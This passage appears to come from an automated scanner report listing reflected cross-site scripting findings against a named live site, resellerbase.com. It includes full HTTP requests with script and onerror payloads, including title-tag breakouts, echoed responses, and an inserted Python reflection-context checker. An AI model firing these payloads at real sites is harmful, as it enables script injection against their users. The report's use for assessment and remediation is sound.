This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tag/themes/kosmos/images/rating7ccae<a>7d884378ca2/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:01:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag/themes/kosmos/images/rating7ccae<a>7d884378ca2/ was not found on this server.</p>
...[SNIP]...

2.4451. http://www.resellerbase.com/tag/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b86bb<script>alert(1)</script>ea02d362aff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag/themes/kosmos/images/rating/?b86bb<script>alert(1)</script>ea02d362aff=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:59:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag/themes/kosmos/images/rating/?b86bb<script>alert(1)</script>ea02d362aff=1 was not found on this server.</p>
...[SNIP]...

2.4452. http://www.resellerbase.com/tag/themes/kosmos/images/rating/0.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 20ea2<script>alert(1)</script>5252f849e6a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag20ea2<script>alert(1)</script>5252f849e6a/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:53:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag20ea2<script>alert(1)</script>5252f849e6a/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.4453. http://www.resellerbase.com/tag/themes/kosmos/images/rating/0.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 58d24<img%20src%3da%20onerror%3dalert(1)>d6947fb555c was submitted in the REST URL parameter 2. This input was echoed as 58d24<img src=a onerror=alert(1)>d6947fb555c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. Unlike the 404 findings above, this request is answered with 200 by the tag-browsing page: everything after /tag/ is treated as the tag name and written into the table caption without HTML encoding, and the onerror handler runs as soon as the bogus image source fails to load.

Request

GET /tag/themes58d24<img%20src%3da%20onerror%3dalert(1)>d6947fb555c/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes58d24<img src=a onerror=alert(1)>d6947fb555c/kosmos/images/rating/0.gif]</td>
...[SNIP]...

2.4454. http://www.resellerbase.com/tag/themes/kosmos/images/rating/0.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 8a901</title><img%20src%3da%20onerror%3dalert(1)>b0c282dd456 was submitted in the REST URL parameter 2. This input was echoed as 8a901</title><img src=a onerror=alert(1)>b0c282dd456 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. Tags inside <title> are not parsed as markup, which is why this probe first closes the element with </title>; the <img> that follows is then parsed normally and its onerror handler fires.

Request

GET /tag/themes8a901</title><img%20src%3da%20onerror%3dalert(1)>b0c282dd456/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes8a901</title><img src=a onerror=alert(1)>b0c282dd456/kosmos/images/rating/0.gif</title>
...[SNIP]...
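The reflection contexts the report distinguishes (plain text between tags in the 404 page of 2.4440, plain text in the tag-page caption of 2.4453, and text between TITLE tags of 2.4454) can be told apart mechanically from the response body. The following Python is an added example, not code from the report or from resellerbase.com; the response bodies are constructed here from the report's snippets and shortened, and html.escape() stands in for the htmlspecialchars() call that would fix the PHP side.

```python
"""Find where a probe is reflected in an HTML response and whether it can run.

Added example: not part of the scanner report or of the target application.
It reconstructs the report's reflection contexts ("plain text between tags"
versus "text between TITLE tags") from response bodies modelled on the
snippets in findings 2.4440, 2.4453 and 2.4454; the bodies are constructed
and shortened. html.escape() plays the role of PHP's htmlspecialchars().
"""
import html
import re

# A reflected string can run script if it carries a <script> tag or an on* handler.
EXECUTABLE = re.compile(r"<script\b|<\w+[^>]*\son\w+\s*=", re.IGNORECASE)


def context_at(body: str, offset: int) -> str:
    """Return 'attribute', 'title' or 'text' for where a reflection starts."""
    before = body[:offset]
    lower = before.lower()
    last_lt = before.rfind("<")
    if last_lt != -1 and before.find(">", last_lt) == -1:
        return "attribute"                       # inside an unfinished start tag
    title_open = lower.rfind("<title")
    if title_open != -1 and lower.find("</title>", title_open) == -1:
        return "title"                           # RCDATA: tags here are plain text
    return "text"


def executable(probe: str, context: str) -> bool:
    """Does a verbatim reflection of `probe` in `context` yield running script?"""
    if context == "title":
        # Markup inside <title> is inert; the probe must close the element first.
        close = probe.lower().find("</title>")
        if close == -1:
            return False
        probe = probe[close + len("</title>"):]
    elif context != "text":
        return False                             # attribute contexts need their own analysis
    return EXECUTABLE.search(probe) is not None


def assess(body: str, probe: str) -> list:
    """One (context, executable) pair per verbatim occurrence of `probe` in `body`."""
    results, start = [], 0
    while (pos := body.find(probe, start)) != -1:
        ctx = context_at(body, pos)
        results.append((ctx, executable(probe, ctx)))
        start = pos + 1
    return results


def fixed_404(url: str) -> str:
    """The 404 page with the URL HTML-encoded, as htmlspecialchars() would emit it."""
    return ("<html><head><title>Error 404 - Page Not Found</title></head><body>"
            f"<p>The requested URL {html.escape(url, quote=True)} was not found on this server.</p>"
            "</body></html>")


# Constructed bodies modelled on the report's response snippets.
P1 = "332d3<script>alert(1)</script>405f428f184"
NOT_FOUND = ("<html><head><title>Error 404 - Page Not Found</title></head><body>"
             f"<p>The requested URL /tag/themes/kosmos/?{P1}=1 was not found on this server.</p>"
             "</body></html>")
P2 = "58d24<img src=a onerror=alert(1)>d6947fb555c"
TAG_PAGE = (f"<html><head><title>Browse by Tag: themes{P2}/kosmos/images/rating/0.gif</title></head><body>"
            f'<td class="tbl_caption"> Web Links [Tag : themes{P2}/kosmos/images/rating/0.gif]</td>'
            "</body></html>")
P3 = "8a901</title><img src=a onerror=alert(1)>b0c282dd456"
TAG_PAGE_TITLE = (f"<html><head><title>Browse by Tag: themes{P3}/kosmos/images/rating/0.gif</title></head>"
                  "<body></body></html>")

if __name__ == "__main__":
    cases = [("404 page", NOT_FOUND, P1),
             ("tag page", TAG_PAGE, P2),
             ("tag page, title breakout", TAG_PAGE_TITLE, P3),
             ("fixed 404 page", fixed_404(f"/tag/themes/kosmos/?{P1}=1"), P1)]
    for name, body, probe in cases:
        print(f"{name}: {assess(body, probe)}")
```

Run as a script, the 404 page and the caption come back as executable text reflections, the bare <img> copy in the title as inert, the </title> variant as executable, and the escaped 404 page as having no verbatim reflection at all. The classifier only looks at where a reflection starts, so an attribute context is named but not graded; the report's findings in this section are all text or TITLE contexts.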

2.4455. http://www.resellerbase.com/tag/themes/kosmos/images/rating/0.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 35ccb<img%20src%3da%20onerror%3dalert(1)>cde5cffe9af was submitted in the REST URL parameter 3. This input was echoed as 35ccb<img src=a onerror=alert(1)>cde5cffe9af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos35ccb<img%20src%3da%20onerror%3dalert(1)>cde5cffe9af/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos35ccb<img src=a onerror=alert(1)>cde5cffe9af/images/rating/0.gif]</td>
...[SNIP]...

2.4456. http://www.resellerbase.com/tag/themes/kosmos/images/rating/0.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload ca2c8</title><img%20src%3da%20onerror%3dalert(1)>b15e7d829e1 was submitted in the REST URL parameter 3. This input was echoed as ca2c8</title><img src=a onerror=alert(1)>b15e7d829e1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmosca2c8</title><img%20src%3da%20onerror%3dalert(1)>b15e7d829e1/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmosca2c8</title><img src=a onerror=alert(1)>b15e7d829e1/images/rating/0.gif</title>
...[SNIP]...

2.4457. http://www.resellerbase.com/tag/themes/kosmos/images/rating/0.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 534fc<img%20src%3da%20onerror%3dalert(1)>f2c91ecdbcc was submitted in the REST URL parameter 4. This input was echoed as 534fc<img src=a onerror=alert(1)>f2c91ecdbcc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images534fc<img%20src%3da%20onerror%3dalert(1)>f2c91ecdbcc/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images534fc<img src=a onerror=alert(1)>f2c91ecdbcc/rating/0.gif]</td>
...[SNIP]...

2.4458. http://www.resellerbase.com/tag/themes/kosmos/images/rating/0.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as text between TITLE tags. The payload 24a51</title><img%20src%3da%20onerror%3dalert(1)>f47ba14e50f was submitted in the REST URL parameter 4. This input was echoed as 24a51</title><img src=a onerror=alert(1)>f47ba14e50f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images24a51</title><img%20src%3da%20onerror%3dalert(1)>f47ba14e50f/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images24a51</title><img src=a onerror=alert(1)>f47ba14e50f/rating/0.gif</title>
...[SNIP]...

2.4459. http://www.resellerbase.com/tag/themes/kosmos/images/rating/0.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload d7d3e<img%20src%3da%20onerror%3dalert(1)>24db88654d3 was submitted in the REST URL parameter 5. This input was echoed as d7d3e<img src=a onerror=alert(1)>24db88654d3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/ratingd7d3e<img%20src%3da%20onerror%3dalert(1)>24db88654d3/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images/ratingd7d3e<img src=a onerror=alert(1)>24db88654d3/0.gif]</td>
...[SNIP]...

2.4460. http://www.resellerbase.com/tag/themes/kosmos/images/rating/0.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as text between TITLE tags. The payload 2acd6</title><img%20src%3da%20onerror%3dalert(1)>d807a006166 was submitted in the REST URL parameter 5. This input was echoed as 2acd6</title><img src=a onerror=alert(1)>d807a006166 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/rating2acd6</title><img%20src%3da%20onerror%3dalert(1)>d807a006166/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images/rating2acd6</title><img src=a onerror=alert(1)>d807a006166/0.gif</title>
...[SNIP]...

2.4461. http://www.resellerbase.com/tag/themes/kosmos/images/rating/0.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as text between TITLE tags. The payload 62f20</title><img%20src%3da%20onerror%3dalert(1)>47fd1df1a5 was submitted in the REST URL parameter 6. This input was echoed as 62f20</title><img src=a onerror=alert(1)>47fd1df1a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/rating/0.gif62f20</title><img%20src%3da%20onerror%3dalert(1)>47fd1df1a5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:55:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9858

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images/rating/0.gif62f20</title><img src=a onerror=alert(1)>47fd1df1a5</title>
...[SNIP]...

2.4462. http://www.resellerbase.com/tag/themes/kosmos/images/rating/0.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload efb16<img%20src%3da%20onerror%3dalert(1)>7d263e0b2e8 was submitted in the REST URL parameter 6. This input was echoed as efb16<img src=a onerror=alert(1)>7d263e0b2e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/rating/0.gifefb16<img%20src%3da%20onerror%3dalert(1)>7d263e0b2e8 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images/rating/0.gifefb16<img src=a onerror=alert(1)>7d263e0b2e8]</td>
...[SNIP]...

2.4463. http://www.resellerbase.com/tag/themes/kosmos/images/rating/2half.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9d8a7<script>alert(1)</script>9f457131e54 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag9d8a7<script>alert(1)</script>9f457131e54/themes/kosmos/images/rating/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:53:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag9d8a7<script>alert(1)</script>9f457131e54/themes/kosmos/images/rating/2half.gif was not found on this server.</p>
...[SNIP]...

2.4464. http://www.resellerbase.com/tag/themes/kosmos/images/rating/2half.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 79277</title><img%20src%3da%20onerror%3dalert(1)>2339baca94c was submitted in the REST URL parameter 2. This input was echoed as 79277</title><img src=a onerror=alert(1)>2339baca94c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes79277</title><img%20src%3da%20onerror%3dalert(1)>2339baca94c/kosmos/images/rating/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes79277</title><img src=a onerror=alert(1)>2339baca94c/kosmos/images/rating/2half.gif</title>
...[SNIP]...

2.4465. http://www.resellerbase.com/tag/themes/kosmos/images/rating/2half.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cfc3e<img%20src%3da%20onerror%3dalert(1)>b2069389d58 was submitted in the REST URL parameter 2. This input was echoed as cfc3e<img src=a onerror=alert(1)>b2069389d58 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themescfc3e<img%20src%3da%20onerror%3dalert(1)>b2069389d58/kosmos/images/rating/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
